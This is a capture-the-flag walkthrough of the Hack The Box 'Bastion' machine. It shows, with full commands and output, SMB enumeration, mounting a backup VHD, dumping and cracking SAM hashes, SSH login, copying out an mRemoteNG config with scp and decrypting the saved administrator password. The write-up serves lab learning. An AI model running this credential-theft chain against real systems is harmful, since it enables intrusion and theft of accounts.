Bastion
Contents
Ports scan
u505@kali:~/HTB/Machines/Bastion$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.134 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-22 15:31:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 47001/tcp on 10.10.10.134 Discovered open port 135/tcp on 10.10.10.134 Discovered open port 49668/tcp on 10.10.10.134 Discovered open port 49670/tcp on 10.10.10.134 Discovered open port 49667/tcp on 10.10.10.134 Discovered open port 49666/tcp on 10.10.10.134 Discovered open port 49664/tcp on 10.10.10.134 Discovered open port 139/tcp on 10.10.10.134 Discovered open port 22/tcp on 10.10.10.134 Discovered open port 49669/tcp on 10.10.10.134 Discovered open port 49665/tcp on 10.10.10.134 Discovered open port 5985/tcp on 10.10.10.134 Discovered open port 445/tcp on 10.10.10.134
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV 10.10.10.134 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:31 EST Nmap scan report for bastion.htb (10.10.10.134) Host is up (0.039s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: -19m01s, deviation: 34m37s, median: 57s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-02-22T16:32:36+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-02-22T15:32:38 |_ start_date: 2020-02-22T15:15:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds
Nmap on missing ports dicovered by masscan
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV -p 5985,49666,49669,47001,49670,49664,49668,49665,49667 10.10.10.134 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:41 EST Nmap scan report for bastion.htb (10.10.10.134) Host is up (0.039s latency).
PORT STATE SERVICE VERSION 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.71 seconds
Port 445
Nmpa doesn't discover any share.
u505@kali:~/HTB/Machines/Bastion$ nmap -p 445 --script=smb-enum-shares 10.10.10.134 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:36 EST Nmap scan report for bastion.htb (10.10.10.134) Host is up (0.039s latency).
PORT STATE SERVICE 445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
Nullinux
This script doesn't provide any usefull information neither.
u505@kali:~/HTB/Machines/Bastion$ python3 /opt/utils/nullinux/nullinux.py -v bastion.htb
Starting nullinux v5.4.1 | 02-22-2020 10:38
[*] Enumerating Shares for: bastion.htb Shares Comments -------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: bastion.htb [-] Could not attain Domain SID
[*] Enumerating querydispinfo for: bastion.htb
[*] Enumerating enumdomusers for: bastion.htb
[*] Enumerating LSA for: bastion.htb
[*] Performing RID Cycling for: bastion.htb [-] RID Failed: Could not attain Domain SID
[*] Testing bastion.htb for Known Users
[*] Enumerating Group Memberships for: bastion.htb
[*] 0 unique user(s) identified
smbmap
smbmap provides more information.
u505@kali:~/HTB/Machines/Bastion$ smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: bastion.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
[!] Unable to remove test directory at \\10.10.10.134\BackupsvAmwsJkyfR, please remove manually
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2dc-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1c8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-35c-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-3b0-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5e0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 openssh-ssh-agent
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-590-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-24c-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-244-0
IPC$ READ ONLY Remote IPC
smbclient
u505@kali:~/HTB/Machines/Bastion$ smbclient //bastion/Backups Enter WORKGROUP\u505's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Feb 22 10:43:14 2020 .. D 0 Sat Feb 22 10:43:14 2020 nmap-test-file A 260 Sat Feb 22 10:37:21 2020 note.txt AR 116 Tue Apr 16 06:10:09 2019 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019 vAmwsJkyfR D 0 Sat Feb 22 10:43:14 2020 WindowsImageBackup D 0 Fri Feb 22 07:44:02 2019
7735807 blocks of size 4096. 2763043 blocks available smb: \> get note.txt getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
The note tell us to avoid to download the full backup to avoid to DoS ourselves.
u505@kali:~/HTB/Machines/Bastion$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
u505@kali:~/HTB/Machines/Bastion$ mkdir mountpoint u505@kali:~/HTB/Machines/Bastion$ sudo mount -t cifs -o username=anonymous //bastion/Backups mountpoint Password for anonymous@//bastion/Backups:
Backup of a computer
A full backup of a computer is found in the share drive
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -ltr
total 5330560
-rwxr-xr-x 1 root root 37761024 Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 2374620 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
-rwxr-xr-x 1 root root 2894 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1488 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 3988 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7110 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 3844 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 1484 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 6542 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 1078 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 1186 Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 8930 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
mount vhd file
u505@kali:~/HTB/Machines/Bastion$ mkdir -p smb/vhd
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ guestmount --add "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /home/u505/HTB/Machines/Bastion/smb/vhd -v
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem Size Used Avail Use% Mounted on
/dev/fuse 15G 7.4G 7.6G 50% /opt/HTB/Machines/Bastion/smb/vhd
Alternative (and faster) way to mount vhd file
u505@kali:~/HTB/Machines/Bastion$ sudo modprobe nbd
[sudo] password for u505:
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -r -c /dev/nbd0 "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
u505@kali:~/HTB/Machines/Bastion$ sudo mount -r /dev/nbd0p1 smb/vhd/
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem Size Used Avail Use% Mounted on
/dev/nbd0p1 15G 7.4G 7.6G 50% /opt/HTB/Machines/Bastion/smb/vhd
Copy the SAM from the backup
u505@kali:~/HTB/Machines/Bastion/smb/vhd/Windows/System32/config$ cp SAM SYSTEM ../../../../ u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM > hash.txt u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show 31d6cfe0d16ae931b73c59d7e0c089c0: 26112010952d963c8dc4217daec986d9:bureaulampje
Unmount vhd drive
u505@kali:~/HTB/Machines/Bastion$ sudo umount /opt/HTB/Machines/Bastion/smb/vhd
If vhd image has been mounted with qemu-nbd then disconnect
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -d /dev/nbd0 /dev/nbd0 disconnected
u505@kali:~/HTB/Machines/SwagShop$ sudo umount /opt/HTB/Machines/Bastion/mountpoint
User flag
u505@kali:~/HTB/Machines/Bastion/smb$ ssh L4mpje@bastion.htb The authenticity of host 'bastion.htb (10.10.10.134)' can't be established. ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts. L4mpje@bastion.htb's password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. l4mpje@BASTION C:\Users\L4mpje>cd Desktop l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt <USER_FLAG>
rRemoteNG credentials
mRemoteNG stores passwords in configuration on user profile. There is a master password, but it is not used to encrypt the passwords,...
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>scp confCons.xml u505@10.10.14.6:/home/u505/HTB/Machines/Bastion/confCons.xml The authenticity of host '10.10.14.6 (10.10.14.6)' can't be established. ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.14.6' (ECDSA) to the list of known hosts. u505@10.10.14.6's password: confCons.xml 100% 6316 132.2KB/s 00:00
In the configuration file, there is 2 sets of credentials, Adminsitrator and the well known L4mpje.
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s ="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje
Root Flag
u505@kali:~/HTB/Machines/Bastion$ ssh administrator@bastion.htb administrator@bastion.htb's password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami bastion\administrator administrator@BASTION C:\Users\Administrator>type Desktop\root.txt <ROOT_FLAG>
References
- Mounting VHD file on Kali Linux through remote share
- How to mount a Azure’s VHD disk image on Linux
- mRemoteNG: Just Loaded with “Features”
Daniel Simao 10:28, 22 February 2020 (EST)
